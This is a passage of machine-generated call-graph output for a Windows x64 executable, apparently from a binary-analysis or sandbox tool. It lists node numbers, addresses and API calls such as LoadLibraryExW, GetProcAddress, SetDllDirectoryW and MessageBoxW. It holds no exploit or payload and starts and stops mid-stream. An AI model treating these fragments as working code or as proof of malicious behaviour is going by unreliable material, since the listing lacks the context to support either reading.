7ff6404f49e1 CloseHandle 18593 7ff6404f496a 18588->18593 18589 7ff6404f49cb CloseHandle 18589->18593 18590 7ff6404f49f5 18594 7ff6404f4368 _fread_nolock 11 API calls 18590->18594 18591 7ff6404f4a20 18646 7ff6404f4cd4 18591->18646 18592->18593 18598 7ff6404f49ff 18594->18598 18598->18593 18600 7ff6404f4ada 18599->18600 18601 7ff6404f4b97 18599->18601 18602 7ff6404f4b06 GetFileInformationByHandle 18600->18602 18606 7ff6404f4e10 21 API calls 18600->18606 18603 7ff6404f4bc1 18601->18603 18604 7ff6404f4b9f 18601->18604 18607 7ff6404f4bb2 GetLastError 18602->18607 18608 7ff6404f4b2f 18602->18608 18605 7ff6404f4be4 PeekNamedPipe 18603->18605 18623 7ff6404f4b82 18603->18623 18604->18607 18609 7ff6404f4ba3 18604->18609 18605->18623 18611 7ff6404f4af4 18606->18611 18610 7ff6404f4368 _fread_nolock 11 API calls 18607->18610 18612 7ff6404f4cd4 51 API calls 18608->18612 18613 7ff6404f43f4 _set_fmode 11 API calls 18609->18613 18610->18623 18611->18602 18611->18623 18615 7ff6404f4b3a 18612->18615 18613->18623 18614 7ff6404eb870 _log10_special 8 API calls 18616 7ff6404f49c4 18614->18616 18663 7ff6404f4c34 18615->18663 18616->18588 18616->18589 18619 7ff6404f4c34 10 API calls 18620 7ff6404f4b59 18619->18620 18621 7ff6404f4c34 10 API calls 18620->18621 18622 7ff6404f4b6a 18621->18622 18622->18623 18624 7ff6404f43f4 _set_fmode 11 API calls 18622->18624 18623->18614 18624->18623 18626 7ff6404f4f4a 18625->18626 18627 7ff6404f4fe2 __std_exception_destroy 18626->18627 18628 7ff6404f43f4 _set_fmode 11 API calls 18626->18628 18629 7ff6404eb870 _log10_special 8 API calls 18627->18629 18630 7ff6404f4f5c 18628->18630 18631 7ff6404f49f1 18629->18631 18632 7ff6404f43f4 _set_fmode 11 API calls 18630->18632 18631->18590 18631->18591 18633 7ff6404f4f64 18632->18633 18634 7ff6404f7118 45 API calls 18633->18634 18635 7ff6404f4f79 18634->18635 18636 7ff6404f4f81 18635->18636 18637 7ff6404f4f8b 18635->18637 18638 7ff6404f43f4 _set_fmode 11 API calls 18636->18638 18639 7ff6404f43f4 _set_fmode 11 API calls 18637->18639 18643 7ff6404f4f86 18638->18643 18640 7ff6404f4f90 18639->18640 18640->18627 18641 7ff6404f43f4 _set_fmode 11 API calls 18640->18641 18642 7ff6404f4f9a 18641->18642 18644 7ff6404f7118 45 API calls 18642->18644 18643->18627 18645 7ff6404f4fd4 GetDriveTypeW 18643->18645 18644->18643 18645->18627 18648 7ff6404f4cfc 18646->18648 18647 7ff6404f4a2d 18656 7ff6404f4e10 18647->18656 18648->18647 18670 7ff6404fea34 18648->18670 18650 7ff6404f4d90 18650->18647 18651 7ff6404fea34 51 API calls 18650->18651 18652 7ff6404f4da3 18651->18652 18652->18647 18653 7ff6404fea34 51 API calls 18652->18653 18654 7ff6404f4db6 18653->18654 18654->18647 18655 7ff6404fea34 51 API calls 18654->18655 18655->18647 18657 7ff6404f4e2a 18656->18657 18658 7ff6404f4e61 18657->18658 18659 7ff6404f4e3a 18657->18659 18660 7ff6404fe8c8 21 API calls 18658->18660 18661 7ff6404f4e4a 18659->18661 18662 7ff6404f4368 _fread_nolock 11 API calls 18659->18662 18660->18661 18661->18598 18662->18661 18664 7ff6404f4c50 18663->18664 18665 7ff6404f4c5d FileTimeToSystemTime 18663->18665 18664->18665 18667 7ff6404f4c58 18664->18667 18666 7ff6404f4c71 SystemTimeToTzSpecificLocalTime 18665->18666 18665->18667 18666->18667 18668 7ff6404eb870 _log10_special 8 API calls 18667->18668 18669 7ff6404f4b49 18668->18669 18669->18619 18671 7ff6404fea41 18670->18671 18672 7ff6404fea65 18670->18672 18671->18672 18673 7ff6404fea46 18671->18673 18675 7ff6404fea9f 18672->18675 18678 7ff6404feabe 18672->18678 18674 7ff6404f43f4 _set_fmode 11 API calls 18673->18674 18676 7ff6404fea4b 18674->18676 18677 7ff6404f43f4 _set_fmode 11 API calls 18675->18677 18680 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18676->18680 18681 7ff6404feaa4 18677->18681 18679 7ff6404f4178 45 API calls 18678->18679 18685 7ff6404feacb 18679->18685 18682 7ff6404fea56 18680->18682 18683 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18681->18683 18682->18650 18684 7ff6404feaaf 18683->18684 18684->18650 18685->18684 18686 7ff6404ff7ec 51 API calls 18685->18686 18686->18685 20182 7ff640509ef3 20184 7ff640509f03 20182->20184 20186 7ff6404f4788 LeaveCriticalSection 20184->20186 19796 7ff6404ebe70 19797 7ff6404ebe80 19796->19797 19813 7ff6404f8ec0 19797->19813 19799 7ff6404ebe8c 19819 7ff6404ec168 19799->19819 19801 7ff6404ec44c 7 API calls 19803 7ff6404ebf25 19801->19803 19802 7ff6404ebea4 _RTC_Initialize 19811 7ff6404ebef9 19802->19811 19824 7ff6404ec318 19802->19824 19805 7ff6404ebeb9 19827 7ff6404f832c 19805->19827 19811->19801 19812 7ff6404ebf15 19811->19812 19814 7ff6404f8ed1 19813->19814 19815 7ff6404f8ed9 19814->19815 19816 7ff6404f43f4 _set_fmode 11 API calls 19814->19816 19815->19799 19817 7ff6404f8ee8 19816->19817 19818 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19817->19818 19818->19815 19820 7ff6404ec179 19819->19820 19823 7ff6404ec17e __scrt_release_startup_lock 19819->19823 19821 7ff6404ec44c 7 API calls 19820->19821 19820->19823 19822 7ff6404ec1f2 19821->19822 19823->19802 19852 7ff6404ec2dc 19824->19852 19826 7ff6404ec321 19826->19805 19828 7ff6404f834c 19827->19828 19829 7ff6404ebec5 19827->19829 19830 7ff6404f8354 19828->19830 19831 7ff6404f836a GetModuleFileNameW 19828->19831 19829->19811 19851 7ff6404ec3ec InitializeSListHead 19829->19851 19832 7ff6404f43f4 _set_fmode 11 API calls 19830->19832 19835 7ff6404f8395 19831->19835 19833 7ff6404f8359 19832->19833 19834 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19833->19834 19834->19829 19836 7ff6404f82cc 11 API calls 19835->19836 19837 7ff6404f83d5 19836->19837 19838 7ff6404f83dd 19837->19838 19842 7ff6404f83f5 19837->19842 19839 7ff6404f43f4 _set_fmode 11 API calls 19838->19839 19840 7ff6404f83e2 19839->19840 19841 7ff6404f9c58 __free_lconv_num 11 API calls 19840->19841 19841->19829 19843 7ff6404f8417 19842->19843 19845 7ff6404f8443 19842->19845 19846 7ff6404f845c 19842->19846 19844 7ff6404f9c58 __free_lconv_num 11 API calls 19843->19844 19844->19829 19847 7ff6404f9c58 __free_lconv_num 11 API calls 19845->19847 19849 7ff6404f9c58 __free_lconv_num 11 API calls 19846->19849 19848 7ff6404f844c 19847->19848 19850 7ff6404f9c58 __free_lconv_num 11 API calls 19848->19850 19849->19843 19850->19829 19853 7ff6404ec2ef 19852->19853 19854 7ff6404ec2f6 19852->19854 19853->19826 19856 7ff6404f94fc 19854->19856 19859 7ff6404f9138 19856->19859 19866 7ff6404ff5e8 EnterCriticalSection 19859->19866 19934 7ff6404f9060 19937 7ff6404f8fe4 19934->19937 19944 7ff6404ff5e8 EnterCriticalSection 19937->19944 20239 7ff6404fa2e0 20240 7ff6404fa2e5 20239->20240 20241 7ff6404fa2fa 20239->20241 20245 7ff6404fa300 20240->20245 20246 7ff6404fa342 20245->20246 20247 7ff6404fa34a 20245->20247 20248 7ff6404f9c58 __free_lconv_num 11 API calls 20246->20248 20249 7ff6404f9c58 __free_lconv_num 11 API calls 20247->20249 20248->20247 20250 7ff6404fa357 20249->20250 20251 7ff6404f9c58 __free_lconv_num 11 API calls 20250->20251 20252 7ff6404fa364 20251->20252 20253 7ff6404f9c58 __free_lconv_num 11 API calls 20252->20253 20254 7ff6404fa371 20253->20254 20255 7ff6404f9c58 __free_lconv_num 11 API calls 20254->20255 20256 7ff6404fa37e 20255->20256 20257 7ff6404f9c58 __free_lconv_num 11 API calls 20256->20257 20258 7ff6404fa38b 20257->20258 20259 7ff6404f9c58 __free_lconv_num 11 API calls 20258->20259 20260 7ff6404fa398 20259->20260 20261 7ff6404f9c58 __free_lconv_num 11 API calls 20260->20261 20262 7ff6404fa3a5 20261->20262 20263 7ff6404f9c58 __free_lconv_num 11 API calls 20262->20263 20264 7ff6404fa3b5 20263->20264 20265 7ff6404f9c58 __free_lconv_num 11 API calls 20264->20265 20266 7ff6404fa3c5 20265->20266 20271 7ff6404fa1a4 20266->20271 20285 7ff6404ff5e8 EnterCriticalSection 20271->20285 15828 7ff6404ebf5c 15849 7ff6404ec12c 15828->15849 15831 7ff6404ec0a8 15972 7ff6404ec44c IsProcessorFeaturePresent 15831->15972 15832 7ff6404ebf78 __scrt_acquire_startup_lock 15834 7ff6404ec0b2 15832->15834 15839 7ff6404ebf96 __scrt_release_startup_lock 15832->15839 15835 7ff6404ec44c 7 API calls 15834->15835 15837 7ff6404ec0bd _CreateFrameInfo 15835->15837 15836 7ff6404ebfbb 15838 7ff6404ec041 15855 7ff6404ec594 15838->15855 15839->15836 15839->15838 15961 7ff6404f8e44 15839->15961 15841 7ff6404ec046 15858 7ff6404e1000 15841->15858 15846 7ff6404ec069 15846->15837 15968 7ff6404ec2b0 15846->15968 15850 7ff6404ec134 15849->15850 15851 7ff6404ec140 __scrt_dllmain_crt_thread_attach 15850->15851 15852 7ff6404ebf70 15851->15852 15853 7ff6404ec14d 15851->15853 15852->15831 15852->15832 15853->15852 15979 7ff6404ecba8 15853->15979 16006 7ff6405097e0 15855->16006 15859 7ff6404e1009 15858->15859 16008 7ff6404f4794 15859->16008 15861 7ff6404e352b 16015 7ff6404e33e0 15861->16015 15864 7ff6404e3538 16206 7ff6404eb870 15864->16206 15869 7ff6404e356c 15872 7ff6404e1bf0 49 API calls 15869->15872 15870 7ff6404e3736 16215 7ff6404e3f70 15870->16215 15888 7ff6404e3588 15872->15888 15874 7ff6404e3785 15876 7ff6404e25f0 53 API calls 15874->15876 15876->15864 15878 7ff6404e3778 15880 7ff6404e379f 15878->15880 15881 7ff6404e377d 15878->15881 15879 7ff6404e365f __std_exception_destroy 15882 7ff6404e3834 15879->15882 15885 7ff6404e7e10 14 API calls 15879->15885 15884 7ff6404e1bf0 49 API calls 15880->15884 16234 7ff6404ef36c 15881->16234 15911 7ff6404e3805 __std_exception_destroy 15882->15911 16238 7ff6404e3e90 15882->16238 15887 7ff6404e37be 15884->15887 15889 7ff6404e36ae 15885->15889 15894 7ff6404e18f0 115 API calls 15887->15894 16077 7ff6404e7e10 15888->16077 16090 7ff6404e7f80 15889->16090 15890 7ff6404e3852 15892 7ff6404e3865 15890->15892 15893 7ff6404e3871 15890->15893 16241 7ff6404e3fe0 15892->16241 15897 7ff6404e1bf0 49 API calls 15893->15897 15898 7ff6404e37df 15894->15898 15895 7ff6404e36bd 15899 7ff6404e380f 15895->15899 15901 7ff6404e36cf 15895->15901 15897->15911 15898->15888 15900 7ff6404e37ef 15898->15900 16099 7ff6404e8400 15899->16099 15904 7ff6404e25f0 53 API calls 15900->15904 16095 7ff6404e1bf0 15901->16095 15904->15864 15907 7ff6404e389e SetDllDirectoryW 15910 7ff6404e38c3 15907->15910 15914 7ff6404e3a50 15910->15914 16155 7ff6404e6560 15910->16155 16150 7ff6404e86b0 15911->16150 15912 7ff6404e36fc 16195 7ff6404e25f0 15912->16195 15918 7ff6404e3a5a PostMessageW GetMessageW 15914->15918 15919 7ff6404e3a7d 15914->15919 15918->15919 16299 7ff6404e3080 15919->16299 15921 7ff6404e38ea 15923 7ff6404e3947 15921->15923 15925 7ff6404e3901 15921->15925 16244 7ff6404e65a0 15921->16244 15923->15914 15930 7ff6404e395c 15923->15930 15937 7ff6404e3905 15925->15937 16265 7ff6404e6970 15925->16265 16175 7ff6404e30e0 15930->16175 15932 7ff6404e6780 FreeLibrary 15935 7ff6404e3aa3 15932->15935 15937->15923 16281 7ff6404e2870 15937->16281 15962 7ff6404f8e7c 15961->15962 15963 7ff6404f8e5b 15961->15963 18417 7ff6404f96e8 15962->18417 15963->15838 15966 7ff6404ec5d8 GetModuleHandleW 15967 7ff6404ec5e9 15966->15967 15967->15846 15969 7ff6404ec2c1 15968->15969 15970 7ff6404ec080 15969->15970 15971 7ff6404ecba8 7 API calls 15969->15971 15970->15836 15971->15970 15973 7ff6404ec472 _isindst memcpy_s 15972->15973 15974 7ff6404ec491 RtlCaptureContext RtlLookupFunctionEntry 15973->15974 15975 7ff6404ec4ba RtlVirtualUnwind 15974->15975 15976 7ff6404ec4f6 memcpy_s 15974->15976 15975->15976 15977 7ff6404ec528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15976->15977 15978 7ff6404ec576 _isindst 15977->15978 15978->15834 15980 7ff6404ecbb0 15979->15980 15981 7ff6404ecbba 15979->15981 15985 7ff6404ecf44 15980->15985 15981->15852 15986 7ff6404ecf53 15985->15986 15988 7ff6404ecbb5 15985->15988 15993 7ff6404ed180 15986->15993 15989 7ff6404ecfb0 15988->15989 15990 7ff6404ecfdb 15989->15990 15991 7ff6404ecfbe DeleteCriticalSection 15990->15991 15992 7ff6404ecfdf 15990->15992 15991->15990 15992->15981 15997 7ff6404ecfe8 15993->15997 16003 7ff6404ed0d2 TlsFree 15997->16003 16004 7ff6404ed02c __vcrt_InitializeCriticalSectionEx 15997->16004 15998 7ff6404ed05a LoadLibraryExW 16000 7ff6404ed07b GetLastError 15998->16000 16001 7ff6404ed0f9 15998->16001 15999 7ff6404ed119 GetProcAddress 15999->16003 16000->16004 16001->15999 16002 7ff6404ed110 FreeLibrary 16001->16002 16002->15999 16004->15998 16004->15999 16004->16003 16005 7ff6404ed09d LoadLibraryExW 16004->16005 16005->16001 16005->16004 16007 7ff6404ec5ab GetStartupInfoW 16006->16007 16007->15841 16011 7ff6404fe790 16008->16011 16009 7ff6404fe7e3 16312 7ff6404f9b24 16009->16312 16011->16009 16012 7ff6404fe836 16011->16012 16322 7ff6404fe668 16012->16322 16014 7ff6404fe80c 16014->15861 16368 7ff6404ebb70 16015->16368 16018 7ff6404e341b 16375 7ff6404e29e0 16018->16375 16019 7ff6404e3438 16370 7ff6404e85a0 FindFirstFileExW 16019->16370 16023 7ff6404e34a5 16394 7ff6404e8760 16023->16394 16024 7ff6404e344b 16385 7ff6404e8620 CreateFileW 16024->16385 16026 7ff6404eb870 _log10_special 8 API calls 16029 7ff6404e34dd 16026->16029 16028 7ff6404e34b3 16031 7ff6404e342e 16028->16031 16034 7ff6404e26c0 49 API calls 16028->16034 16029->15864 16037 7ff6404e18f0 16029->16037 16031->16026 16032 7ff6404e3474 __vcrt_InitializeCriticalSectionEx 16032->16023 16033 7ff6404e345c 16388 7ff6404e26c0 16033->16388 16034->16031 16038 7ff6404e3f70 108 API calls 16037->16038 16039 7ff6404e1925 16038->16039 16040 7ff6404e1bb6 16039->16040 16042 7ff6404e76a0 83 API calls 16039->16042 16041 7ff6404eb870 _log10_special 8 API calls 16040->16041 16043 7ff6404e1bd1 16041->16043 16044 7ff6404e196b 16042->16044 16043->15869 16043->15870 16076 7ff6404e199c 16044->16076 16792 7ff6404ef9f4 16044->16792 16045 7ff6404ef36c 74 API calls 16045->16040 16047 7ff6404e1985 16048 7ff6404e19a1 16047->16048 16049 7ff6404e1989 16047->16049 16796 7ff6404ef6bc 16048->16796 16799 7ff6404e2760 16049->16799 16053 7ff6404e19bf 16055 7ff6404e2760 53 API calls 16053->16055 16054 7ff6404e19d7 16056 7ff6404e19ee 16054->16056 16057 7ff6404e1a06 16054->16057 16055->16076 16059 7ff6404e2760 53 API calls 16056->16059 16058 7ff6404e1bf0 49 API calls 16057->16058 16060 7ff6404e1a1d 16058->16060 16059->16076 16061 7ff6404e1bf0 49 API calls 16060->16061 16062 7ff6404e1a68 16061->16062 16063 7ff6404ef9f4 73 API calls 16062->16063 16064 7ff6404e1a8c 16063->16064 16065 7ff6404e1aa1 16064->16065 16066 7ff6404e1ab9 16064->16066 16067 7ff6404e2760 53 API calls 16065->16067 16068 7ff6404ef6bc _fread_nolock 53 API calls 16066->16068 16067->16076 16069 7ff6404e1ace 16068->16069 16070 7ff6404e1ad4 16069->16070 16071 7ff6404e1aec 16069->16071 16073 7ff6404e2760 53 API calls 16070->16073 16816 7ff6404ef430 16071->16816 16073->16076 16075 7ff6404e25f0 53 API calls 16075->16076 16076->16045 16078 7ff6404e7e1a 16077->16078 16079 7ff6404e86b0 2 API calls 16078->16079 16080 7ff6404e7e39 GetEnvironmentVariableW 16079->16080 16081 7ff6404e7ea2 16080->16081 16082 7ff6404e7e56 ExpandEnvironmentStringsW 16080->16082 16083 7ff6404eb870 _log10_special 8 API calls 16081->16083 16082->16081 16084 7ff6404e7e78 16082->16084 16086 7ff6404e7eb4 16083->16086 16085 7ff6404e8760 2 API calls 16084->16085 16087 7ff6404e7e8a 16085->16087 16086->15879 16088 7ff6404eb870 _log10_special 8 API calls 16087->16088 16089 7ff6404e7e9a 16088->16089 16089->15879 16091 7ff6404e86b0 2 API calls 16090->16091 16092 7ff6404e7f94 16091->16092 17025 7ff6404f7548 16092->17025 16094 7ff6404e7fa6 __std_exception_destroy 16094->15895 16096 7ff6404e1c15 16095->16096 16097 7ff6404f3ca4 49 API calls 16096->16097 16098 7ff6404e1c38 16097->16098 16098->15911 16098->15912 16100 7ff6404e8415 16099->16100 17043 7ff6404e7b50 GetCurrentProcess OpenProcessToken 16100->17043 16103 7ff6404e7b50 7 API calls 16104 7ff6404e8441 16103->16104 16105 7ff6404e8474 16104->16105 16106 7ff6404e845a 16104->16106 16108 7ff6404e2590 48 API calls 16105->16108 16107 7ff6404e2590 48 API calls 16106->16107 16109 7ff6404e8472 16107->16109 16110 7ff6404e8487 LocalFree LocalFree 16108->16110 16109->16110 16111 7ff6404e84a3 16110->16111 16113 7ff6404e84af 16110->16113 17053 7ff6404e2940 16111->17053 16114 7ff6404eb870 _log10_special 8 API calls 16113->16114 16151 7ff6404e86d2 MultiByteToWideChar 16150->16151 16154 7ff6404e86f6 16150->16154 16152 7ff6404e870c __std_exception_destroy 16151->16152 16151->16154 16152->15907 16153 7ff6404e8713 MultiByteToWideChar 16153->16152 16154->16152 16154->16153 16156 7ff6404e6575 16155->16156 16157 7ff6404e38d5 16156->16157 16158 7ff6404e2760 53 API calls 16156->16158 16159 7ff6404e6b00 16157->16159 16158->16157 16160 7ff6404e6b30 16159->16160 16173 7ff6404e6b4a __std_exception_destroy 16159->16173 16160->16173 17337 7ff6404e1440 16160->17337 16162 7ff6404e6b54 16163 7ff6404e3fe0 49 API calls 16162->16163 16162->16173 16164 7ff6404e6b76 16163->16164 16165 7ff6404e6b7b 16164->16165 16166 7ff6404e3fe0 49 API calls 16164->16166 16167 7ff6404e2870 53 API calls 16165->16167 16168 7ff6404e6b9a 16166->16168 16167->16173 16168->16165 16169 7ff6404e3fe0 49 API calls 16168->16169 16170 7ff6404e6bb6 16169->16170 16170->16165 16171 7ff6404e6bbf 16170->16171 16173->15921 16186 7ff6404e30ee memcpy_s 16175->16186 16176 7ff6404eb870 _log10_special 8 API calls 16177 7ff6404e338e 16176->16177 16177->15864 16194 7ff6404e83e0 LocalFree 16177->16194 16178 7ff6404e32e7 16178->16176 16180 7ff6404e1bf0 49 API calls 16180->16186 16181 7ff6404e3309 16183 7ff6404e25f0 53 API calls 16181->16183 16183->16178 16186->16178 16186->16180 16186->16181 16187 7ff6404e32e9 16186->16187 16189 7ff6404e2870 53 API calls 16186->16189 16192 7ff6404e32f7 16186->16192 17398 7ff6404e3f10 16186->17398 17404 7ff6404e7530 16186->17404 17415 7ff6404e15c0 16186->17415 17453 7ff6404e68e0 16186->17453 17457 7ff6404e3b40 16186->17457 17501 7ff6404e3e00 16186->17501 16188 7ff6404e25f0 53 API calls 16187->16188 16188->16178 16189->16186 16193 7ff6404e25f0 53 API calls 16192->16193 16193->16178 16196 7ff6404e262a 16195->16196 16197 7ff6404f3ca4 49 API calls 16196->16197 16198 7ff6404e2652 16197->16198 16199 7ff6404e86b0 2 API calls 16198->16199 16200 7ff6404e266a 16199->16200 16201 7ff6404e268e MessageBoxA 16200->16201 16202 7ff6404e2677 MessageBoxW 16200->16202 16203 7ff6404e26a0 16201->16203 16202->16203 16208 7ff6404eb879 16206->16208 16207 7ff6404e372a 16207->15966 16208->16207 16209 7ff6404ebc00 IsProcessorFeaturePresent 16208->16209 16210 7ff6404ebc18 16209->16210 17637 7ff6404ebdf8 RtlCaptureContext 16210->17637 16216 7ff6404e3f7c 16215->16216 16217 7ff6404e86b0 2 API calls 16216->16217 16218 7ff6404e3fa4 16217->16218 16219 7ff6404e86b0 2 API calls 16218->16219 16220 7ff6404e3fb7 16219->16220 17642 7ff6404f52a4 16220->17642 16223 7ff6404eb870 _log10_special 8 API calls 16224 7ff6404e3746 16223->16224 16224->15874 16225 7ff6404e76a0 16224->16225 16226 7ff6404e76c4 16225->16226 16227 7ff6404e779b __std_exception_destroy 16226->16227 16228 7ff6404ef9f4 73 API calls 16226->16228 16227->15878 16229 7ff6404e76e0 16228->16229 16229->16227 18033 7ff6404f6bd8 16229->18033 16231 7ff6404e76f5 16231->16227 16232 7ff6404ef9f4 73 API calls 16231->16232 16233 7ff6404ef6bc _fread_nolock 53 API calls 16231->16233 16232->16231 16233->16231 16235 7ff6404ef39c 16234->16235 18048 7ff6404ef148 16235->18048 16237 7ff6404ef3b5 16237->15874 16239 7ff6404e1bf0 49 API calls 16238->16239 16240 7ff6404e3ead 16239->16240 16240->15890 16242 7ff6404e1bf0 49 API calls 16241->16242 16243 7ff6404e4010 16242->16243 16243->15911 16248 7ff6404e65bc 16244->16248 16245 7ff6404eb870 _log10_special 8 API calls 16246 7ff6404e66f1 16245->16246 16246->15925 16247 7ff6404e17e0 45 API calls 16247->16248 16248->16247 16249 7ff6404e675d 16248->16249 16250 7ff6404e1bf0 49 API calls 16248->16250 16252 7ff6404e674a 16248->16252 16254 7ff6404e3f10 10 API calls 16248->16254 16255 7ff6404e66df 16248->16255 16256 7ff6404e670d 16248->16256 16257 7ff6404e7530 52 API calls 16248->16257 16259 7ff6404e2870 53 API calls 16248->16259 16260 7ff6404e6737 16248->16260 16261 7ff6404e15c0 118 API calls 16248->16261 16263 7ff6404e6720 16248->16263 16251 7ff6404e25f0 53 API calls 16249->16251 16250->16248 16251->16255 16253 7ff6404e25f0 53 API calls 16252->16253 16253->16255 16254->16248 16255->16245 16258 7ff6404e25f0 53 API calls 16256->16258 16257->16248 16258->16255 16259->16248 16262 7ff6404e25f0 53 API calls 16260->16262 16261->16248 16262->16255 16264 7ff6404e25f0 53 API calls 16263->16264 16264->16255 18059 7ff6404e81a0 16265->18059 16267 7ff6404e6989 16268 7ff6404e81a0 3 API calls 16267->16268 16269 7ff6404e699c 16268->16269 16270 7ff6404e69cf 16269->16270 16271 7ff6404e69b4 16269->16271 16272 7ff6404e25f0 53 API calls 16270->16272 18063 7ff6404e6ea0 GetProcAddress 16271->18063 16274 7ff6404e3916 16272->16274 16274->15937 16275 7ff6404e6cd0 16274->16275 16276 7ff6404e6ced 16275->16276 16282 7ff6404e28aa 16281->16282 16283 7ff6404f3ca4 49 API calls 16282->16283 16284 7ff6404e28d2 16283->16284 16285 7ff6404e86b0 2 API calls 16284->16285 16286 7ff6404e28ea 16285->16286 16287 7ff6404e290e MessageBoxA 16286->16287 16288 7ff6404e28f7 MessageBoxW 16286->16288 16289 7ff6404e2920 16287->16289 16288->16289 16290 7ff6404eb870 _log10_special 8 API calls 16289->16290 16291 7ff6404e2930 16290->16291 16292 7ff6404e6780 16291->16292 16293 7ff6404e68d6 16292->16293 16298 7ff6404e6792 16292->16298 16293->15923 18128 7ff6404e5af0 16299->18128 16302 7ff6404e30b9 16308 7ff6404e33a0 16302->16308 16309 7ff6404e33ae 16308->16309 16310 7ff6404e33bf 16309->16310 18416 7ff6404e8180 FreeLibrary 16309->18416 16310->15932 16329 7ff6404f986c 16312->16329 16315 7ff6404f9b5f 16315->16014 16367 7ff6404f477c EnterCriticalSection 16322->16367 16330 7ff6404f98c3 16329->16330 16331 7ff6404f9888 GetLastError 16329->16331 16330->16315 16335 7ff6404f98d8 16330->16335 16332 7ff6404f9898 16331->16332 16342 7ff6404fa6a0 16332->16342 16336 7ff6404f98f4 GetLastError SetLastError 16335->16336 16337 7ff6404f990c 16335->16337 16336->16337 16337->16315 16338 7ff6404f9c10 IsProcessorFeaturePresent 16337->16338 16339 7ff6404f9c23 16338->16339 16359 7ff6404f9924 16339->16359 16343 7ff6404fa6bf FlsGetValue 16342->16343 16344 7ff6404fa6da FlsSetValue 16342->16344 16345 7ff6404fa6d4 16343->16345 16347 7ff6404f98b3 SetLastError 16343->16347 16346 7ff6404fa6e7 16344->16346 16344->16347 16345->16344 16348 7ff6404fdea8 _set_fmode 11 API calls 16346->16348 16347->16330 16349 7ff6404fa6f6 16348->16349 16350 7ff6404fa714 FlsSetValue 16349->16350 16351 7ff6404fa704 FlsSetValue 16349->16351 16353 7ff6404fa732 16350->16353 16354 7ff6404fa720 FlsSetValue 16350->16354 16352 7ff6404fa70d 16351->16352 16356 7ff6404f9c58 __free_lconv_num 11 API calls 16352->16356 16355 7ff6404fa204 _set_fmode 11 API calls 16353->16355 16354->16352 16357 7ff6404fa73a 16355->16357 16356->16347 16358 7ff6404f9c58 __free_lconv_num 11 API calls 16357->16358 16358->16347 16360 7ff6404f995e _isindst memcpy_s 16359->16360 16361 7ff6404f9986 RtlCaptureContext RtlLookupFunctionEntry 16360->16361 16362 7ff6404f99c0 RtlVirtualUnwind 16361->16362 16363 7ff6404f99f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16361->16363 16362->16363 16364 7ff6404f9a48 _isindst 16363->16364 16365 7ff6404eb870 _log10_special 8 API calls 16364->16365 16366 7ff6404f9a67 GetCurrentProcess TerminateProcess 16365->16366 16369 7ff6404e33ec GetModuleFileNameW 16368->16369 16369->16018 16369->16019 16371 7ff6404e85df FindClose 16370->16371 16372 7ff6404e85f2 16370->16372 16371->16372 16373 7ff6404eb870 _log10_special 8 API calls 16372->16373 16374 7ff6404e3442 16373->16374 16374->16023 16374->16024 16376 7ff6404ebb70 16375->16376 16377 7ff6404e29fc GetLastError 16376->16377 16378 7ff6404e2a29 16377->16378 16399 7ff6404f3ef8 16378->16399 16383 7ff6404eb870 _log10_special 8 API calls 16384 7ff6404e2ae5 16383->16384 16384->16031 16386 7ff6404e8660 GetFinalPathNameByHandleW CloseHandle 16385->16386 16387 7ff6404e3458 16385->16387 16386->16387 16387->16032 16387->16033 16389 7ff6404e26fa 16388->16389 16390 7ff6404f3ef8 48 API calls 16389->16390 16391 7ff6404e2722 MessageBoxW 16390->16391 16392 7ff6404eb870 _log10_special 8 API calls 16391->16392 16393 7ff6404e274c 16392->16393 16393->16031 16395 7ff6404e878a WideCharToMultiByte 16394->16395 16396 7ff6404e87b5 16394->16396 16395->16396 16397 7ff6404e87cb __std_exception_destroy 16395->16397 16396->16397 16398 7ff6404e87d2 WideCharToMultiByte 16396->16398 16397->16028 16398->16397 16400 7ff6404f3f52 16399->16400 16401 7ff6404f3f77 16400->16401 16402 7ff6404f3fb3 16400->16402 16403 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16401->16403 16421 7ff6404f22b0 16402->16421 16405 7ff6404f3fa1 16403->16405 16406 7ff6404eb870 _log10_special 8 API calls 16405->16406 16409 7ff6404e2a54 FormatMessageW 16406->16409 16407 7ff6404f9c58 __free_lconv_num 11 API calls 16407->16405 16417 7ff6404e2590 16409->16417 16410 7ff6404f4094 16410->16407 16411 7ff6404f40ba 16411->16410 16414 7ff6404f40c4 16411->16414 16412 7ff6404f4069 16415 7ff6404f9c58 __free_lconv_num 11 API calls 16412->16415 16413 7ff6404f4060 16413->16410 16413->16412 16416 7ff6404f9c58 __free_lconv_num 11 API calls 16414->16416 16415->16405 16416->16405 16418 7ff6404e25b5 16417->16418 16419 7ff6404f3ef8 48 API calls 16418->16419 16420 7ff6404e25d8 MessageBoxW 16419->16420 16420->16383 16422 7ff6404f22ee 16421->16422 16423 7ff6404f22de 16421->16423 16424 7ff6404f22f7 16422->16424 16430 7ff6404f2325 16422->16430 16425 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16423->16425 16426 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16424->16426 16427 7ff6404f231d 16425->16427 16426->16427 16427->16410 16427->16411 16427->16412 16427->16413 16430->16423 16430->16427 16432 7ff6404f2cc4 16430->16432 16465 7ff6404f2710 16430->16465 16502 7ff6404f1ea0 16430->16502 16433 7ff6404f2d06 16432->16433 16434 7ff6404f2d77 16432->16434 16435 7ff6404f2da1 16433->16435 16436 7ff6404f2d0c 16433->16436 16437 7ff6404f2dd0 16434->16437 16438 7ff6404f2d7c 16434->16438 16525 7ff6404f1074 16435->16525 16441 7ff6404f2d40 16436->16441 16442 7ff6404f2d11 16436->16442 16444 7ff6404f2dda 16437->16444 16445 7ff6404f2de7 16437->16445 16449 7ff6404f2ddf 16437->16449 16439 7ff6404f2db1 16438->16439 16440 7ff6404f2d7e 16438->16440 16532 7ff6404f0c64 16439->16532 16443 7ff6404f2d20 16440->16443 16452 7ff6404f2d8d 16440->16452 16447 7ff6404f2d17 16441->16447 16441->16449 16442->16445 16442->16447 16463 7ff6404f2e10 16443->16463 16505 7ff6404f3478 16443->16505 16444->16435 16444->16449 16539 7ff6404f39cc 16445->16539 16447->16443 16453 7ff6404f2d52 16447->16453 16460 7ff6404f2d3b 16447->16460 16449->16463 16543 7ff6404f1484 16449->16543 16452->16435 16455 7ff6404f2d92 